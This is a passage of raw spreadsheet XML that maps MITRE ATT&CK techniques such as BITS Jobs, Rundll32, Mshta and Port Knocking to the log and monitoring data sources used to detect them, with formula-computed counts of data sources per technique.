        <v>File monitoring,Web proxy</v>
      </c>
      <c r="C220" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D220" s="17">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E220" s="17">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F220" s="13"/>
      <c r="G220" s="53" t="str">
        <f>VLOOKUP(A220,'REF-DataSources'!A:B,2)</f>
        <v>Compromise Software Supply Chain</v>
      </c>
    </row>
    <row r="221" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A221" s="53" t="s">
        <v>1509</v>
      </c>
      <c r="B221" s="17" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:C)</f>
        <v>Component firmware,BIOS,Disk forensics,EFI</v>
      </c>
      <c r="C221" s="17"/>
      <c r="D221" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E221" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F221" s="13"/>
      <c r="G221" s="53" t="str">
        <f>VLOOKUP(A221,'REF-DataSources'!A:B,2)</f>
        <v>Compromise Hardware Supply Chain</v>
      </c>
    </row>
    <row r="222" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A222" s="53" t="s">
        <v>321</v>
      </c>
      <c r="B222" s="17" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Packet capture,Windows event logs</v>
      </c>
      <c r="C222" s="17"/>
      <c r="D222" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E222" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F222" s="13"/>
      <c r="G222" s="53" t="str">
        <f>VLOOKUP(A222,'REF-DataSources'!A:B,2)</f>
        <v>BITS Jobs</v>
      </c>
    </row>
    <row r="223" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A223" s="53" t="s">
        <v>323</v>
      </c>
      <c r="B223" s="17" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Application logs,Authentication logs,Third-party application logs</v>
      </c>
      <c r="C223" s="17"/>
      <c r="D223" s="17">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E223" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F223" s="13"/>
      <c r="G223" s="53" t="str">
        <f>VLOOKUP(A223,'REF-DataSources'!A:B,2)</f>
        <v>Trusted Relationship</v>
      </c>
    </row>
    <row r="224" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A224" s="55" t="s">
        <v>324</v>
      </c>
      <c r="B224" s="17" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:C)</f>
        <v>Asset management,Data loss prevention</v>
      </c>
      <c r="C224" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D224" s="17">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E224" s="17">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F224" s="13"/>
      <c r="G224" s="53" t="str">
        <f>VLOOKUP(A224,'REF-DataSources'!A:B,2)</f>
        <v>Hardware Additions</v>
      </c>
    </row>
    <row r="225" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A225" s="55" t="s">
        <v>325</v>
      </c>
      <c r="B225" s="17" t="str">
        <f>LOOKUP(A225,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C225" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D225" s="17">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E225" s="17">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F225" s="13"/>
      <c r="G225" s="53" t="str">
        <f>VLOOKUP(A225,'REF-DataSources'!A:B,2)</f>
        <v>Password Policy Discovery</v>
      </c>
    </row>
    <row r="226" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A226" s="53" t="s">
        <v>326</v>
      </c>
      <c r="B226" s="17" t="str">
        <f>LOOKUP(A226,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C226" s="17"/>
      <c r="D226" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E226" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F226" s="13"/>
      <c r="G226" s="53" t="str">
        <f>VLOOKUP(A226,'REF-DataSources'!A:B,2)</f>
        <v>Indirect Command Execution</v>
      </c>
    </row>
    <row r="227" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A227" s="55" t="s">
        <v>327</v>
      </c>
      <c r="B227" s="17" t="str">
        <f>LOOKUP(A227,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,System calls,Process monitoring</v>
      </c>
      <c r="C227" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D227" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E227" s="17">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F227" s="13"/>
      <c r="G227" s="53" t="str">
        <f>VLOOKUP(A227,'REF-DataSources'!A:B,2)</f>
        <v>Exploitation for Client Execution</v>
      </c>
    </row>
    <row r="228" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A228" s="55" t="s">
        <v>328</v>
      </c>
      <c r="B228" s="17" t="str">
        <f>LOOKUP(A228,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C228" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D228" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E228" s="17">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F228" s="13"/>
      <c r="G228" s="53" t="str">
        <f>VLOOKUP(A228,'REF-DataSources'!A:B,2)</f>
        <v>User Execution</v>
      </c>
    </row>
    <row r="229" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A229" s="55" t="s">
        <v>1543</v>
      </c>
      <c r="B229" s="17" t="str">
        <f>LOOKUP(A229,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Process monitoring,Web proxy</v>
      </c>
      <c r="C229" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D229" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E229" s="17">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F229" s="13"/>
      <c r="G229" s="53" t="str">
        <f>VLOOKUP(A229,'REF-DataSources'!A:B,2)</f>
        <v>Malicious Link</v>
      </c>
    </row>
    <row r="230" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A230" s="55" t="s">
        <v>1548</v>
      </c>
      <c r="B230" s="17" t="str">
        <f>LOOKUP(A230,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C230" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D230" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E230" s="17">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F230" s="13"/>
      <c r="G230" s="53" t="str">
        <f>VLOOKUP(A230,'REF-DataSources'!A:B,2)</f>
        <v>Malicious File</v>
      </c>
    </row>
    <row r="231" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A231" s="55" t="s">
        <v>329</v>
      </c>
      <c r="B231" s="17" t="str">
        <f>LOOKUP(A231,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow</v>
      </c>
      <c r="C231" s="17" t="s">
        <v>122</v>
      </c>
      <c r="D231" s="17">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E231" s="17">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F231" s="13"/>
      <c r="G231" s="53" t="str">
        <f>VLOOKUP(A231,'REF-DataSources'!A:B,2)</f>
        <v>Traffic Signaling</v>
      </c>
    </row>
    <row r="232" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A232" s="55" t="s">
        <v>1558</v>
      </c>
      <c r="B232" s="17" t="str">
        <f>LOOKUP(A232,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C232" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D232" s="17">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E232" s="17">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F232" s="13"/>
      <c r="G232" s="53" t="str">
        <f>VLOOKUP(A232,'REF-DataSources'!A:B,2)</f>
        <v>Port Knocking</v>
      </c>
    </row>
    <row r="233" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A233" s="55" t="s">
        <v>331</v>
      </c>
      <c r="B233" s="17" t="str">
        <f>LOOKUP(A233,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
      <c r="C233" s="17" t="s">
        <v>332</v>
      </c>
      <c r="D233" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E233" s="17">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F233" s="13"/>
      <c r="G233" s="53" t="str">
        <f>VLOOKUP(A233,'REF-DataSources'!A:B,2)</f>
        <v>Rogue Domain Controller</v>
      </c>
    </row>
    <row r="234" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A234" s="55" t="s">
        <v>336</v>
      </c>
      <c r="B234" s="17" t="str">
        <f>LOOKUP(A234,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C234" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D234" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E234" s="17">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F234" s="13"/>
      <c r="G234" s="53" t="str">
        <f>VLOOKUP(A234,'REF-DataSources'!A:B,2)</f>
        <v>Exploitation of Remote Services</v>
      </c>
    </row>
    <row r="235" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A235" s="55" t="s">
        <v>337</v>
      </c>
      <c r="B235" s="17" t="str">
        <f>LOOKUP(A235,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C235" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D235" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E235" s="17">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F235" s="13"/>
      <c r="G235" s="53" t="str">
        <f>VLOOKUP(A235,'REF-DataSources'!A:B,2)</f>
        <v>Exploitation for Defense Evasion</v>
      </c>
    </row>
    <row r="236" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A236" s="55" t="s">
        <v>338</v>
      </c>
      <c r="B236" s="17" t="str">
        <f>LOOKUP(A236,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows Error Reporting,Process monitoring</v>
      </c>
      <c r="C236" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D236" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E236" s="17">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F236" s="13"/>
      <c r="G236" s="53" t="str">
        <f>VLOOKUP(A236,'REF-DataSources'!A:B,2)</f>
        <v>Exploitation for Credential Access</v>
      </c>
    </row>
    <row r="237" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A237" s="53" t="s">
        <v>339</v>
      </c>
      <c r="B237" s="17" t="str">
        <f>LOOKUP(A237,'REF-DataSources'!A:C)</f>
        <v>OAuth audit logs,Application logs,Authentication logs,Data loss prevention,Third-party application logs</v>
      </c>
      <c r="C237" s="17"/>
      <c r="D237" s="17">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E237" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F237" s="13"/>
      <c r="G237" s="53" t="str">
        <f>VLOOKUP(A237,'REF-DataSources'!A:B,2)</f>
        <v>Data from Information Repositories</v>
      </c>
    </row>
    <row r="238" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A238" s="53" t="s">
        <v>1583</v>
      </c>
      <c r="B238" s="17" t="str">
        <f>LOOKUP(A238,'REF-DataSources'!A:C)</f>
        <v>Third-party application logs,Authentication logs</v>
      </c>
      <c r="C238" s="17"/>
      <c r="D238" s="17">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E238" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F238" s="13"/>
      <c r="G238" s="53" t="str">
        <f>VLOOKUP(A238,'REF-DataSources'!A:B,2)</f>
        <v>Confluence</v>
      </c>
    </row>
    <row r="239" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A239" s="53" t="s">
        <v>1589</v>
      </c>
      <c r="B239" s="17" t="str">
        <f>LOOKUP(A239,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Authentication logs,Application logs</v>
      </c>
      <c r="C239" s="17"/>
      <c r="D239" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E239" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F239" s="13"/>
      <c r="G239" s="53" t="str">
        <f>VLOOKUP(A239,'REF-DataSources'!A:B,2)</f>
        <v>Sharepoint</v>
      </c>
    </row>
    <row r="240" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A240" s="55" t="s">
        <v>342</v>
      </c>
      <c r="B240" s="17" t="str">
        <f>LOOKUP(A240,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C240" s="17" t="s">
        <v>122</v>
      </c>
      <c r="D240" s="17">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E240" s="17">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F240" s="13"/>
      <c r="G240" s="53" t="str">
        <f>VLOOKUP(A240,'REF-DataSources'!A:B,2)</f>
        <v>Signed Script Proxy Execution</v>
      </c>
    </row>
    <row r="241" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A241" s="55" t="s">
        <v>1598</v>
      </c>
      <c r="B241" s="17" t="str">
        <f>LOOKUP(A241,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C241" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D241" s="17">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E241" s="17">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F241" s="13"/>
      <c r="G241" s="53" t="str">
        <f>VLOOKUP(A241,'REF-DataSources'!A:B,2)</f>
        <v>PubPrn</v>
      </c>
    </row>
    <row r="242" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A242" s="55" t="s">
        <v>343</v>
      </c>
      <c r="B242" s="17" t="str">
        <f>LOOKUP(A242,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C242" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D242" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E242" s="17">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F242" s="13"/>
      <c r="G242" s="53" t="str">
        <f>VLOOKUP(A242,'REF-DataSources'!A:B,2)</f>
        <v>Browser Bookmark Discovery</v>
      </c>
    </row>
    <row r="243" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A243" s="53" t="s">
        <v>344</v>
      </c>
      <c r="B243" s="17" t="str">
        <f>LOOKUP(A243,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Binary file metadata,Process use of network,Windows Registry,Loaded DLLs,DLL monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C243" s="17"/>
      <c r="D243" s="17">
        <f t="shared" si="7"/>
        <v>9</v>
      </c>
      <c r="E243" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F243" s="13"/>
      <c r="G243" s="53" t="str">
        <f>VLOOKUP(A243,'REF-DataSources'!A:B,2)</f>
        <v>Signed Binary Proxy Execution</v>
      </c>
    </row>
    <row r="244" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A244" s="53" t="s">
        <v>1610</v>
      </c>
      <c r="B244" s="17" t="str">
        <f>LOOKUP(A244,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C244" s="17"/>
      <c r="D244" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E244" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F244" s="13"/>
      <c r="G244" s="53" t="str">
        <f>VLOOKUP(A244,'REF-DataSources'!A:B,2)</f>
        <v>Compiled HTML File</v>
      </c>
    </row>
    <row r="245" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A245" s="53" t="s">
        <v>1615</v>
      </c>
      <c r="B245" s="17" t="str">
        <f>LOOKUP(A245,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Windows Registry,DLL monitoring,Binary file metadata,API monitoring</v>
      </c>
      <c r="C245" s="17"/>
      <c r="D245" s="17">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E245" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F245" s="13"/>
      <c r="G245" s="53" t="str">
        <f>VLOOKUP(A245,'REF-DataSources'!A:B,2)</f>
        <v>Control Panel</v>
      </c>
    </row>
    <row r="246" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A246" s="53" t="s">
        <v>1620</v>
      </c>
      <c r="B246" s="17" t="str">
        <f>LOOKUP(A246,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process use of network,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C246" s="17"/>
      <c r="D246" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E246" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F246" s="13"/>
      <c r="G246" s="53" t="str">
        <f>VLOOKUP(A246,'REF-DataSources'!A:B,2)</f>
        <v>CMSTP</v>
      </c>
    </row>
    <row r="247" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A247" s="55" t="s">
        <v>1625</v>
      </c>
      <c r="B247" s="17" t="str">
        <f>LOOKUP(A247,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C247" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D247" s="17">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E247" s="17">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F247" s="13"/>
      <c r="G247" s="53" t="str">
        <f>VLOOKUP(A247,'REF-DataSources'!A:B,2)</f>
        <v>InstallUtil</v>
      </c>
    </row>
    <row r="248" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A248" s="53" t="s">
        <v>1629</v>
      </c>
      <c r="B248" s="17" t="str">
        <f>LOOKUP(A248,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C248" s="17"/>
      <c r="D248" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E248" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F248" s="13"/>
      <c r="G248" s="53" t="str">
        <f>VLOOKUP(A248,'REF-DataSources'!A:B,2)</f>
        <v>Mshta</v>
      </c>
    </row>
    <row r="249" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A249" s="53" t="s">
        <v>1633</v>
      </c>
      <c r="B249" s="17" t="str">
        <f>LOOKUP(A249,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C249" s="17"/>
      <c r="D249" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E249" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F249" s="13"/>
      <c r="G249" s="53" t="str">
        <f>VLOOKUP(A249,'REF-DataSources'!A:B,2)</f>
        <v>Msiexec</v>
      </c>
    </row>
    <row r="250" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A250" s="53" t="s">
        <v>1638</v>
      </c>
      <c r="B250" s="17" t="str">
        <f>LOOKUP(A250,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C250" s="17"/>
      <c r="D250" s="17">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E250" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F250" s="13"/>
      <c r="G250" s="53" t="str">
        <f>VLOOKUP(A250,'REF-DataSources'!A:B,2)</f>
        <v>Odbcconf</v>
      </c>
    </row>
    <row r="251" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A251" s="55" t="s">
        <v>1643</v>
      </c>
      <c r="B251" s="17" t="str">
        <f>LOOKUP(A251,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C251" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D251" s="17">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E251" s="17">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F251" s="13"/>
      <c r="G251" s="53" t="str">
        <f>VLOOKUP(A251,'REF-DataSources'!A:B,2)</f>
        <v>Regsvcs/Regasm</v>
      </c>
    </row>
    <row r="252" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A252" s="53" t="s">
        <v>1647</v>
      </c>
      <c r="B252" s="17" t="str">
        <f>LOOKUP(A252,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring,Loaded DLLs</v>
      </c>
      <c r="C252" s="17"/>
      <c r="D252" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E252" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F252" s="13"/>
      <c r="G252" s="53" t="str">
        <f>VLOOKUP(A252,'REF-DataSources'!A:B,2)</f>
        <v>Regsvr32</v>
      </c>
    </row>
    <row r="253" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A253" s="53" t="s">
        <v>1653</v>
      </c>
      <c r="B253" s="17" t="str">
        <f>LOOKUP(A253,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Loaded DLLs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C253" s="17"/>
      <c r="D253" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E253" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F253" s="13"/>
      <c r="G253" s="53" t="str">
        <f>VLOOKUP(A253,'REF-DataSources'!A:B,2)</f>
        <v>Rundll32</v>
      </c>
    </row>
    <row r="254" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A254" s="53" t="s">
        <v>1659</v>
      </c>
      <c r="B254" s="17" t="str">
        <f>LOOKUP(A254,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C254" s="17"/>
      <c r="D254" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E254" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F254" s="13"/>
      <c r="G254" s="53" t="str">
        <f>VLOOKUP(A254,'REF-DataSources'!A:B,2)</f>
        <v>Verclsid</v>
      </c>
    </row>
    <row r="255" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A255" s="55" t="s">
        <v>345</v>
      </c>
      <c r="B255" s="17" t="str">
        <f>LOOKUP(A255,'REF-DataSources'!A:C)</f>
        <v>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</v>
      </c>
      <c r="C255" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D255" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E255" s="17">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F255" s="13"/>
      <c r="G255" s="53" t="str">
        <f>VLOOKUP(A255,'REF-DataSources'!A:B,2)</f>
        <v>Remote Access Software</v>
      </c>
    </row>
    <row r="256" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A256" s="55" t="s">
        <v>346</v>
      </c>
      <c r="B256" s="17" t="str">
        <f>LOOKUP(A256,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</v>
      </c>
      <c r="C256" s="17" t="s">
        <v>312</v>
      </c>
      <c r="D256" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E256" s="17">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F256" s="13"/>
      <c r="G256" s="53" t="str">
        <f>VLOOKUP(A256,'REF-DataSources'!A:B,2)</f>
        <v>XSL Script Processing</v>
      </c>
    </row>
    <row r="257" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A257" s="55" t="s">
        <v>347</v>
      </c>
      <c r="B257" s="17" t="str">
        <f>LOOKUP(A257,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Email gateway,Network intrusion detection system,Web logs</v>
      </c>
      <c r="C257" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D257" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E257" s="17">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F257" s="13"/>
      <c r="G257" s="53" t="str">
        <f>VLOOKUP(A257,'REF-DataSources'!A:B,2)</f>
        <v>Template Injection</v>
      </c>
    </row>
    <row r="258" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A258" s="55" t="s">
        <v>348</v>
      </c>
      <c r="B258" s="17" t="str">
        <f>LOOKUP(A258,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C258" s="17" t="s">
        <v>184</v>
      </c>
      <c r="D258" s="17">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E258" s="17">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F258" s="13"/>
      <c r="G258" s="53" t="str">
        <f>VLOOKUP(A258,'REF-DataSources'!A:B,2)</f>
        <v>File and Directory Permissions Modification</v>
      </c>
    </row>
    <row r="259" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A259" s="55" t="s">
        <v>1680</v>
      </c>
      <c r="B259" s="17" t="str">
        <f>LOOKUP(A259,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C259" s="17" t="s">
        <v>184</v>
      </c>
      <c r="D259" s="17">
        <f t="shared" ref="D259:D322" si="9">LEN(TRIM(B259))-LEN(SUBSTITUTE(TRIM(B259),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E259" s="17">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F259" s="13"/>
      <c r="G259" s="53" t="str">
        <f>VLOOKUP(A259,'REF-DataSources'!A:B,2)</f>
        <v>Windows File and Directory Permissions Modification</v>
      </c>
    </row>
    <row r="260" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A260" s="53" t="s">
        <v>1685</v>
      </c>
      <c r="B260" s="17" t="str">
        <f>LOOKUP(A260,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C260" s="17"/>
      <c r="D260" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E260" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F260" s="13"/>
      <c r="G260" s="53" t="str">
        <f>VLOOKUP(A260,'REF-DataSources'!A:B,2)</f>
        <v>Linux and Mac File and Directory Permissions Modification</v>
      </c>
    </row>
    <row r="261" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A261" s="55" t="s">
        <v>350</v>
      </c>
      <c r="B261" s="17" t="str">
        <f>LOOKUP(A261,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C261" s="17">
        <v>100</v>
      </c>
      <c r="D261" s="17">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E261" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F261" s="13"/>
      <c r="G261" s="53" t="str">
        <f>VLOOKUP(A261,'REF-DataSources'!A:B,2)</f>
        <v>Execution Guardrails</v>
      </c>
    </row>
    <row r="262" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A262" s="55" t="s">
        <v>1693</v>
      </c>
      <c r="B262" s="17" t="str">
        <f>LOOKUP(A262,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C262" s="17">
        <v>100</v>
      </c>
      <c r="D262" s="17">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E262" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
